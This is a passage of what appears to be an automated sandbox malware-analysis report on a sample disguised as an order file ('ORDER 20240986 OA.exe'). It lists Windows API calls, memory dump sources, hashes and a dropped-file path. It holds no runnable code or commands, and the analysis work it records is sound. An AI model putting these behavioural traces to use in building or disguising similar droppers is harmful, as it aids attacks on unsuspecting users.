                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileWrite
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3934441357-0
                                                                                                                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                  • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                                                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                  • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                                                                                  APIs
                                                                                                                                                  • VirtualProtect.KERNELBASE(6FBB405C,00000004,00000040,6FBB404C), ref: 6FBB29B5
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ProtectVirtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 544645111-0
                                                                                                                                                  • Opcode ID: 3a569506332054c33c872a583647dc2365a8718dd5433b518966d85aa79ca311
                                                                                                                                                  • Instruction ID: e24c0597f0b02fc966011f4e721cce376ed27326146548c649a8cedc49844f47
                                                                                                                                                  • Opcode Fuzzy Hash: 3a569506332054c33c872a583647dc2365a8718dd5433b518966d85aa79ca311
                                                                                                                                                  • Instruction Fuzzy Hash: D3F0A5B1508A80DECB50CF6AD4857153BF0F75A324B81492EE1A8D7240EB34506ACB11
                                                                                                                                                  APIs
                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Open
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                  • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                                                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                  • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                                                                                  APIs
                                                                                                                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                  • Opcode ID: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                                  • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                                                                                                  • Opcode Fuzzy Hash: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                                  • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403332
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                  • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                  • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                  • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                  APIs
                                                                                                                                                  • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3472027048-0
                                                                                                                                                  • Opcode ID: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                                                                                                  • Instruction ID: a51ecd0892fb275ea92473d319bbbc5ec4fc6164fb370921ec18ec876cc9dfbc
                                                                                                                                                  • Opcode Fuzzy Hash: 4484e40c8847390ad24901e1c64382b1b039e93175f5d76bb293bea36d4a14a5
                                                                                                                                                  • Instruction Fuzzy Hash: A6D05E73E142008BD750DBB8BA8945E73A8F781319320C83BE102F1191E97888524A2D
                                                                                                                                                  APIs
                                                                                                                                                  • GlobalAlloc.KERNELBASE(00000040,?,6FBB123B,?,6FBB12DF,00000019,6FBB11BE,-000000A0), ref: 6FBB1225
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2336495745.000000006FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FBB0000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2336461963.000000006FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336529386.000000006FBB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2336658892.000000006FBB5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_6fbb0000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AllocGlobal
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3761449716-0
                                                                                                                                                  • Opcode ID: 7a0470cc284946e78806da87990b4c3406bd9c4a0b641835bcce2bbd463e028d
                                                                                                                                                  • Instruction ID: aa3f291212b9ce625c86bec750f9829ff1c1b883540dad442c140fe4ff56b8a1
                                                                                                                                                  • Opcode Fuzzy Hash: 7a0470cc284946e78806da87990b4c3406bd9c4a0b641835bcce2bbd463e028d
                                                                                                                                                  • Instruction Fuzzy Hash: 48B00271A44900DFEE41DF65CD47F353654FB45715F844050F605D6145D974D8258635
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                                                                                    • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,?,0040406E), ref: 00404251
                                                                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405613
                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 00405637
                                                                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                                                                                  • ShowWindow.USER32(00000008), ref: 00405686
                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004056CB
                                                                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                                                                                  • EmptyClipboard.USER32 ref: 00405766
                                                                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004057BB
                                                                                                                                                  • CloseClipboard.USER32 ref: 004057C1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                  • String ID: {
                                                                                                                                                  • API String ID: 590372296-366298937
                                                                                                                                                  • Opcode ID: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                                                                                  • Instruction ID: e2c232b37aba284685acfefcf9c5e68312cc9a4ea8bcb72f9f75ba3fcde89da4
                                                                                                                                                  • Opcode Fuzzy Hash: 113d712a5db4ed50a1b1b5b673bec4020998c06132e16f1965ea7ae8cf20c9d1
                                                                                                                                                  • Instruction Fuzzy Hash: 0EB15871900608FFDB119FA0DD89EAE7B79FB48354F00812AFA44BA1A0CB795E51DF58
                                                                                                                                                  APIs
                                                                                                                                                  • GetDlgItem.USER32(?,000003FB), ref: 0040474E
                                                                                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00404778
                                                                                                                                                  • SHBrowseForFolderW.SHELL32(?), ref: 00404829
                                                                                                                                                  • CoTaskMemFree.OLE32(00000000), ref: 00404834
                                                                                                                                                  • lstrcmpiW.KERNEL32(Call,007A1F20,00000000,?,?), ref: 00404866
                                                                                                                                                  • lstrcatW.KERNEL32(?,Call), ref: 00404872
                                                                                                                                                  • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404884
                                                                                                                                                    • Part of subcall function 004058E1: GetDlgItemTextW.USER32(?,?,00000400,004048BB), ref: 004058F4
                                                                                                                                                    • Part of subcall function 0040652B: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00403347,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 0040658E
                                                                                                                                                    • Part of subcall function 0040652B: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040659D
                                                                                                                                                    • Part of subcall function 0040652B: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00403347,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065A2
                                                                                                                                                    • Part of subcall function 0040652B: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ORDER 20240986 OA.exe",00403347,C:\Users\user\AppData\Local\Temp\,74DF3420,004035B6,?,00000006,00000008,0000000A), ref: 004065B5
                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(0079FEF0,?,?,0000040F,?,0079FEF0,0079FEF0,?,?,0079FEF0,?,?,000003FB,?), ref: 00404947
                                                                                                                                                  • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404962
                                                                                                                                                    • Part of subcall function 00404ABB: lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                                                                                    • Part of subcall function 00404ABB: wsprintfW.USER32 ref: 00404B65
                                                                                                                                                    • Part of subcall function 00404ABB: SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2287227071.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ORDER 20240986 OA.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                  • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$Call
                                                                                                                                                  • API String ID: 2624150263-244158548
                                                                                                                                                  • Opcode ID: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                                                                                  • Instruction ID: d6689dd06746f62e3dccefeeeb603cce7d7bc9c76077680089f181f5c68842d6
                                                                                                                                                  • Opcode Fuzzy Hash: 52b5712f2dd952f907a64875e1ccc77d7d09b953cf269de9d4a5e95fdb35a845
                                                                                                                                                  • Instruction Fuzzy Hash: DFA190F1900209ABDB11AFA5CD41AAFB7B8EF85304F10843BF611B62D1D77C99418B6D
                                                                                                                                                  APIs
                                                                                                                                                  • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                  Strings
                                                                                                                                                  • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne\Logoi, xrefs: 004021C3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000000.00000002.2286754998.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000000.00000002.2286713295.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286806992.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                  • Associated: 00000000.00000002.2286852319.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
